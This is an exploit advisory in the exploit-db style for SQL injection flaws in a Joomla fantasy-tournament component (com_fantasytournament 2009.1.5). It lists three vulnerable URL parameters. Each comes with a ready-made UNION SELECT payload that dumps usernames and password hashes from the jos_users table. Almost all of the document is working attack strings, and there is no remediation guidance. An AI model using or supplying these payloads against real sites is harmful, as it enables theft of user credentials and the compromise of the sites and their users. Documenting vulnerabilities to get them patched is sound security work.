############################################################################# # # # Joomla Component Fantasytournament Multiple SQL Injection Vulnerabilities # # # ############################################################################# ######################################## [~] Vulnerability found by: Valon Kerolli [~] Contact: valon[at]itshqip.com [~] Site: www.itshqip.com ######################################## [~] ScriptName: "Joomla" [~] Component: "Fantasytournament (com_fantasytournament)" [~] Version: "2009.1.5" [~] Date: "01/01/2009" [~] Author: "Adrian Gray" [~] Author E-mail: "a.gray@javalamp.co.uk" [~] Author URL: "www.graymoose.com" [~] Component info: "http://extensions.joomla.org/extensions/sports-&-games/sports/1604/details" ######################################## [~] Exploit 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=[SQL] [~] Example 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users-- ######################################## [~] Exploit 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=[SQL] [~] Example 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users-- ######################################## [~] Exploit 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=[SQL] [~] Example 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users-- ########################################